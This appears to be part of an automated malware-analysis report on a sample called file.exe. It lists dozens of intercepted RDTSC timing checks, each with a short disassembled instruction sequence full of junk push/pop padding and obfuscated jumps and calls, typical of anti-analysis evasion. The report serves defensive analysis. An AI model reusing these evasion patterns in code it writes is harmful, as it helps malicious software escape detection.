Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116FA3B second address: 116FA50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f jbe 00007F528105F326h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116FA50 second address: 116FA92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528074EBE2h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F528074EBE9h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F528074EBDDh 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116FA92 second address: 116FA96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116FC17 second address: 116FC2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528074EBDBh 0x00000007 pushad 0x00000008 jl 00007F528074EBD6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116FEAA second address: 116FEB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116FEB2 second address: 116FEBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push edx 0x00000007 pop edx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1170171 second address: 1170175 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1174C55 second address: 1174C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1174C5B second address: 1174C70 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528105F331h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1173BC2 second address: 1173BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F528074EBD6h 0x0000000a jmp 00007F528074EBDBh 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1173BDA second address: 1173BE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F528105F326h 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1137CD0 second address: 1137CD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1137CD4 second address: 1137CDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1137CDA second address: 1137CDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1137CDF second address: 1137D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c jg 00007F528105F326h 0x00000012 pop edi 0x00000013 pop edx 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007F528105F328h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 00000019h 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f mov edi, dword ptr [ebp+122D3806h] 0x00000035 mov ecx, 3CC8F487h 0x0000003a lea eax, dword ptr [ebp+1248B9F6h] 0x00000040 and ecx, dword ptr [ebp+122D3A7Ah] 0x00000046 jmp 00007F528105F32Eh 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007F528105F32Bh 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1137D48 second address: 1113BA3 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F528074EBDCh 0x00000008 jne 00007F528074EBD6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 push ecx 0x00000014 mov ecx, 3543D338h 0x00000019 pop edx 0x0000001a mov dword ptr [ebp+122D1876h], edi 0x00000020 call dword ptr [ebp+122D2918h] 0x00000026 jne 00007F528074EC03h 0x0000002c push ecx 0x0000002d jmp 00007F528074EBE9h 0x00000032 pop ecx 0x00000033 jg 00007F528074EBE2h 0x00000039 jmp 00007F528074EBDCh 0x0000003e pushad 0x0000003f pushad 0x00000040 je 00007F528074EBD6h 0x00000046 pushad 0x00000047 popad 0x00000048 jmp 00007F528074EBE4h 0x0000004d popad 0x0000004e push esi 0x0000004f jo 00007F528074EBD6h 0x00000055 pop esi 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F528074EBE5h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1137E1C second address: 1137E40 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jc 00007F528105F326h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F528105F334h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1137E40 second address: 1137E49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1138315 second address: 1138319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1138319 second address: F7FBDB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d pop edx 0x0000000e nop 0x0000000f sub dword ptr [ebp+122D1E2Ah], edi 0x00000015 push dword ptr [ebp+122D0961h] 0x0000001b jc 00007F528074EBEBh 0x00000021 call dword ptr [ebp+122D357Ah] 0x00000027 pushad 0x00000028 sub dword ptr [ebp+122D1997h], ecx 0x0000002e xor eax, eax 0x00000030 stc 0x00000031 mov edx, dword ptr [esp+28h] 0x00000035 jmp 00007F528074EBE8h 0x0000003a mov dword ptr [ebp+122D3852h], eax 0x00000040 sub dword ptr [ebp+122D1B4Fh], esi 0x00000046 sub dword ptr [ebp+122D1997h], esi 0x0000004c mov esi, 0000003Ch 0x00000051 stc 0x00000052 add esi, dword ptr [esp+24h] 0x00000056 mov dword ptr [ebp+122D1997h], esi 0x0000005c lodsw 0x0000005e cmc 0x0000005f add eax, dword ptr [esp+24h] 0x00000063 pushad 0x00000064 jl 00007F528074EBD8h 0x0000006a mov ebx, edi 0x0000006c mov si, 6DB2h 0x00000070 popad 0x00000071 mov ebx, dword ptr [esp+24h] 0x00000075 cld 0x00000076 nop 0x00000077 push eax 0x00000078 push edx 0x00000079 pushad 0x0000007a pushad 0x0000007b popad 0x0000007c js 00007F528074EBD6h 0x00000082 popad 0x00000083 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1138433 second address: 1138438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1138593 second address: 11385D4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F528074EBE7h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], esi 0x0000000e mov edi, dword ptr [ebp+122D29CDh] 0x00000014 nop 0x00000015 pushad 0x00000016 jmp 00007F528074EBDAh 0x0000001b jc 00007F528074EBD8h 0x00000021 push edx 0x00000022 pop edx 0x00000023 popad 0x00000024 push eax 0x00000025 push edi 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 pop eax 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11385D4 second address: 11385D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1138806 second address: 113880B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1138928 second address: 113892E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113892E second address: 1138950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 stc 0x0000000a push 00000004h 0x0000000c add dword ptr [ebp+122D1D55h], eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F528074EBDDh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1138950 second address: 1138955 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1138C05 second address: 1138C80 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jc 00007F528074EBE5h 0x0000000d jmp 00007F528074EBDFh 0x00000012 nop 0x00000013 cmc 0x00000014 push 0000001Eh 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007F528074EBD8h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 00000015h 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 call 00007F528074EBE3h 0x00000035 mov dword ptr [ebp+122D2C15h], eax 0x0000003b pop ecx 0x0000003c nop 0x0000003d push ebx 0x0000003e jbe 00007F528074EBEAh 0x00000044 jmp 00007F528074EBE4h 0x00000049 pop ebx 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f push ecx 0x00000050 pop ecx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1138C80 second address: 1138C84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1138C84 second address: 1138C8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1139045 second address: 113909C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F528105F32Ch 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007F528105F328h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a lea eax, dword ptr [ebp+1248BA3Ah] 0x00000030 mov ecx, dword ptr [ebp+122D2C4Ch] 0x00000036 nop 0x00000037 push edx 0x00000038 pushad 0x00000039 pushad 0x0000003a popad 0x0000003b jng 00007F528105F326h 0x00000041 popad 0x00000042 pop edx 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 push esi 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113909C second address: 11390A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11390A1 second address: 11390A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11390A7 second address: 11390AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11390AB second address: 11390D5 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F528105F326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D1E08h], esi 0x00000013 lea eax, dword ptr [ebp+1248B9F6h] 0x00000019 mov dword ptr [ebp+122D2A6Fh], ecx 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push edi 0x00000023 jg 00007F528105F326h 0x00000029 pop edi 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11390D5 second address: 1114723 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F528074EBD8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jbe 00007F528074EBDCh 0x00000013 mov edi, dword ptr [ebp+122D1D59h] 0x00000019 call dword ptr [ebp+122D1D8Ah] 0x0000001f jng 00007F528074EBEAh 0x00000025 jng 00007F528074EBD8h 0x0000002b push edx 0x0000002c pop edx 0x0000002d jmp 00007F528074EBDCh 0x00000032 jbe 00007F528074EBDEh 0x00000038 push ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1173EC8 second address: 1173ECF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1173ECF second address: 1173EEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F528074EBE2h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F528074EBD6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1173EEE second address: 1173EF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E5562 second address: 10E5581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007F528074EBDEh 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jne 00007F528074EBD6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1179166 second address: 117916C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117916C second address: 1179174 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1179174 second address: 1179183 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F528105F326h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11792BE second address: 11792C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117A548 second address: 117A56A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528105F32Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F528105F328h 0x00000011 jno 00007F528105F32Ah 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117A56A second address: 117A595 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F528074EBF0h 0x00000008 pushad 0x00000009 jnl 00007F528074EBD6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117C9B6 second address: 117C9BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117C9BA second address: 117C9C6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F528074EBD6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117FD04 second address: 117FD1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528105F334h 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117FD1D second address: 117FD34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F528074EBDCh 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117F8D7 second address: 117F8DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117F8DD second address: 117F8E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F528074EBD6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117F8E9 second address: 117F916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ecx 0x00000009 pushad 0x0000000a jne 00007F528105F326h 0x00000010 jnp 00007F528105F326h 0x00000016 push edx 0x00000017 pop edx 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F528105F332h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117F916 second address: 117F91A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1183D9F second address: 1183DC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F528105F333h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 jbe 00007F528105F326h 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1183DC4 second address: 1183DD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F528074EBD6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1183EFA second address: 1183F02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118446E second address: 1184472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1184472 second address: 1184476 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1184476 second address: 1184486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007F528074EBDCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1184608 second address: 1184613 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F528105F326h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1184613 second address: 1184619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E1F30 second address: 10E1F34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E1F34 second address: 10E1F3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11880C1 second address: 11880E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F528105F332h 0x0000000b jmp 00007F528105F32Dh 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118E2F0 second address: 118E2FA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F528074EBE2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118E2FA second address: 118E300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118CF86 second address: 118CF8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1138A5F second address: 1138A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1138A65 second address: 1138AE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jnl 00007F528074EBE2h 0x0000000d nop 0x0000000e mov dword ptr [ebp+1245A8E9h], ecx 0x00000014 mov ebx, dword ptr [ebp+1248BA35h] 0x0000001a mov edx, 6B362733h 0x0000001f add eax, ebx 0x00000021 push 00000000h 0x00000023 push esi 0x00000024 call 00007F528074EBD8h 0x00000029 pop esi 0x0000002a mov dword ptr [esp+04h], esi 0x0000002e add dword ptr [esp+04h], 00000016h 0x00000036 inc esi 0x00000037 push esi 0x00000038 ret 0x00000039 pop esi 0x0000003a ret 0x0000003b jmp 00007F528074EBE6h 0x00000040 movzx edi, cx 0x00000043 nop 0x00000044 push edx 0x00000045 jmp 00007F528074EBDDh 0x0000004a pop edx 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e push ebx 0x0000004f push edi 0x00000050 pop edi 0x00000051 pop ebx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1138AE0 second address: 1138B11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528105F333h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov edx, dword ptr [ebp+122D1ECEh] 0x00000010 push 00000004h 0x00000012 jg 00007F528105F32Ch 0x00000018 push eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1138B11 second address: 1138B1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1138B1A second address: 1138B1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118D3D8 second address: 118D3E8 instructions: 0x00000000 rdtsc 0x00000002 js 00007F528074EBD6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118D3E8 second address: 118D3EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118D3EC second address: 118D3F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118D3F2 second address: 118D418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F528105F357h 0x0000000c pushad 0x0000000d jmp 00007F528105F337h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119673A second address: 1196759 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 je 00007F528074EBD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F528074EBDCh 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1196759 second address: 1196783 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528105F32Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F528105F336h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1194E0D second address: 1194E15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 rdtsc
